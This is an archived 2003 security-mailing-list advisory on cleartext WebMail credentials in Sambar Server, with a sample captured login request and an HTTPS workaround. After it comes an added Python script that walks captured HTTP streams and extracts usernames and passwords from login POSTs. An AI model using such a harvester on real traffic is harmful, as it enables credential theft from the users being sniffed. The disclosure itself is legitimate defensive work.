From gregory.lebras@security-corporation.com Wed Apr 23 19:18:26 2003
From: Gregory LEBRAS
To: vulnwatch@vulnwatch.org
Date: Thu, 24 Apr 2003 00:43:00 +0200
Subject: [VulnWatch] [SCSA-018] Disclosure of authentication information in Sambar Server

======================================================================
Security Corporation Security Advisory [SCSA-018]
Disclosure of authentication information in Sambar Server
======================================================================

PROGRAM:             Sambar Server
HOMEPAGE:            http://www.sambar.com/
VULNERABLE VERSIONS: 6.0 Beta 1
                     5.3
                     5.2 and prior ?
RISK:                Low/Medium
IMPACT:              Disclosure of authentication information
RELEASE DATE:        2003-04-24

Security Corporation's free weekly newsletter:
http://www.security-corporation.com/newsletter.html

======================================================================
TABLE OF CONTENTS
======================================================================
1..........................................................DESCRIPTION
2..............................................................DETAILS
3.............................................................EXPLOITS
4............................................................SOLUTIONS
5...........................................................WORKAROUND
6..................................................DISCLOSURE TIMELINE
7..............................................................CREDITS
8...........................................................DISCLAIMER
9...........................................................REFERENCES
10............................................................FEEDBACK

1. DESCRIPTION
======================================================================

"Sambar Server is the new standard in high performance multi-functional
servers with features rivaling other commercial products selling
separately for several hundreds of dollars. It's Winsock2 compliant
Win32 integration functions on Windows 95, Windows 98, Windows NT,
Win2000, and XP as a service or as an application."
(direct quote from http://sambar.jalyn.net)

2. DETAILS
======================================================================

- Disclosure of authentication information:

A security vulnerability in Sambar Server allows an attacker to obtain
the username and password of a user who logs in to WebMail. When a user
logs in to the WebMail part of Sambar Server, the username and password
are sent in clear text in the body of an HTTP POST. A remote attacker
with access to the target user's or the target server's traffic stream
can read both the username and the password.

3. EXPLOIT
======================================================================

- Disclosure of authentication information:

This vulnerability is easily exploited by an attacker on the same
network as the user or the server: a network sniffer captures the login
request, and the username and password posted to the server are readable
in it. Here is a capture of the HTTP request (the lines "Browser reload
detected..." and "Posting 200 bytes..." are status messages from the
capturing tool, not part of the request):

-------CUT-------
POST /session/login HTTP/1.0
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
Referer: http://[target]/sysuser/webmail/
Accept-Language: fr
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Host: 192.168.0.23
Content-Length: 200
Pragma: no-cache
Connection: keep-alive

Browser reload detected...
Posting 200 bytes...

RCpage=%2Fsysuser%2Fwebmail%2Fwebmail.stm
onfailure=%2Fsysuser%2Fwebmail%2Frelogin.htm
start=1
RCSdesktop=false
RCSsort=desc
RCSfolder=inbox
RCShome=%2Fsysuser%2Fwebmail
RCuser=administrator
RCpwd=thepassword
-------CUT-------

The credentials are the last two form fields, RCuser and RCpwd, sent
unencoded apart from standard URL form encoding.

4. SOLUTIONS
======================================================================

No vendor fix is available at the time of writing.

5. WORKAROUND
======================================================================

We strongly urge you to start the HTTPS server. The HTTPS server does
not start by default; it must be enabled via the following config.ini
entry:

Act As HTTPS Server = true

Enabling the HTTPS listener only helps if users actually reach the
WebMail login over HTTPS: a login form that is still served and
submitted over plain HTTP continues to send RCuser and RCpwd in the
clear.

6. DISCLOSURE TIMELINE
======================================================================

19/04/2003  Vulnerability discovered
19/04/2003  Vendor notified
20/04/2003  Security Corporation clients notified
23/04/2003  Vendor response
24/04/2003  Public disclosure

7. CREDITS
======================================================================

Discovered by Gregory Le Bras

8. DISCLAIMER
======================================================================

The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS condition.
There are NO warranties with regard to this information. In no event
shall the author be liable for any damages whatsoever arising out of or
in connection with the use or spread of this information. Any use of
this information is at the user's own risk.

9. REFERENCES
======================================================================

- Original version: http://www.security-corporation.com/advisories-018.html
- French version:   http://www.security-corporation.com/index.php?id=advisories&a=018-FR

10. FEEDBACK
======================================================================

Please send suggestions, updates, and comments to:

Security Corporation
http://www.security-corporation.com
info@security-corporation.com
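The capture in section 3 shows what a passive sniffer sees on the wire. The following Python script is an added example, not code from the advisory or from Sambar: it reassembles a constructed client-to-server HTTP stream modelled on that capture (the path /session/login and the field names RCuser/RCpwd come from the capture; the other headers, the GET that precedes the login and the password value are made up), splits the stream into requests using Content-Length, and pulls the credential fields out of the url-encoded login body. It goes slightly beyond the single request on the page: it walks a keep-alive stream carrying several requests, and it reports a truncated capture as an error instead of silently returning a partial body.

```python
"""Passive credential harvesting from a captured HTTP stream.

Added example, not code from the advisory or from Sambar. The sample stream
below is constructed to resemble the capture in section 3 of the advisory:
the path /session/login and the field names RCuser/RCpwd come from the
capture, the remaining headers and the password value are made up.
"""
from urllib.parse import parse_qs

# Form fields carrying the WebMail credentials, as named in the capture.
CREDENTIAL_FIELDS = ("RCuser", "RCpwd")

# Constructed: the login form body as a browser posts it (fields joined by '&').
SAMPLE_BODY = (
    b"RCpage=%2Fsysuser%2Fwebmail%2Fwebmail.stm"
    b"&onfailure=%2Fsysuser%2Fwebmail%2Frelogin.htm"
    b"&start=1&RCSdesktop=false&RCSsort=desc&RCSfolder=inbox"
    b"&RCShome=%2Fsysuser%2Fwebmail"
    b"&RCuser=administrator&RCpwd=thepassword"
)

# Constructed: a keep-alive client->server stream, a GET for the login page
# followed by the credential POST. Content-Length is derived, not hand-counted.
SAMPLE_STREAM = (
    b"GET /sysuser/webmail/ HTTP/1.0\r\n"
    b"Host: 192.168.0.23\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    b"POST /session/login HTTP/1.0\r\n"
    b"Referer: http://192.168.0.23/sysuser/webmail/\r\n"
    b"Content-Type: application/x-www-form-urlencoded\r\n"
    b"Host: 192.168.0.23\r\n"
    b"Content-Length: " + str(len(SAMPLE_BODY)).encode() + b"\r\n"
    b"Connection: keep-alive\r\n"
    b"\r\n"
    + SAMPLE_BODY
)


def parse_request(raw):
    """Parse one HTTP request at the start of `raw`.

    Returns (request_line, headers, body, consumed_bytes). Raises ValueError
    when the capture ends before the headers or the Content-Length body are
    complete, so a truncated capture is reported rather than yielding a
    partial body as if it were the whole login.
    """
    end = raw.find(b"\r\n\r\n")
    if end < 0:
        raise ValueError("incomplete request: end of headers not found")
    lines = raw[:end].decode("iso-8859-1").split("\r\n")
    request_line = lines[0]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()  # names are case-insensitive
    length = int(headers.get("content-length", "0"))
    body_start = end + 4
    body = raw[body_start:body_start + length]
    if len(body) < length:
        raise ValueError("truncated body: Content-Length %d, captured %d"
                         % (length, len(body)))
    return request_line, headers, body, body_start + length


def iter_requests(stream):
    """Yield (request_line, headers, body) for each request in a client->server stream."""
    pos = 0
    while pos < len(stream):
        request_line, headers, body, consumed = parse_request(stream[pos:])
        yield request_line, headers, body
        pos += consumed


def credentials_from_request(request_line, headers, body):
    """Return {field: value} for the credential fields of a WebMail login POST, else None."""
    parts = request_line.split(" ")
    if len(parts) != 3 or parts[0] != "POST":
        return None
    if parts[1].split("?", 1)[0] != "/session/login":
        return None
    if not headers.get("content-type", "").startswith("application/x-www-form-urlencoded"):
        return None
    fields = parse_qs(body.decode("iso-8859-1"), keep_blank_values=True)
    found = {name: fields[name][0] for name in CREDENTIAL_FIELDS if name in fields}
    return found or None


def harvest_credentials(stream):
    """Walk a captured stream and collect every credential pair sent in the clear."""
    hits = []
    for request_line, headers, body in iter_requests(stream):
        creds = credentials_from_request(request_line, headers, body)
        if creds:
            hits.append(creds)
    return hits


if __name__ == "__main__":
    for hit in harvest_credentials(SAMPLE_STREAM):
        print("WebMail login seen in clear: user=%(RCuser)s password=%(RCpwd)s" % hit)
```

The same parser works on a reassembled TCP payload from any capture tool; the point it makes is that nothing in the protocol stands between the attacker and the RCpwd value once the traffic is plain HTTP, which is why the workaround in section 5 has to move the login itself onto HTTPS rather than merely start the HTTPS listener.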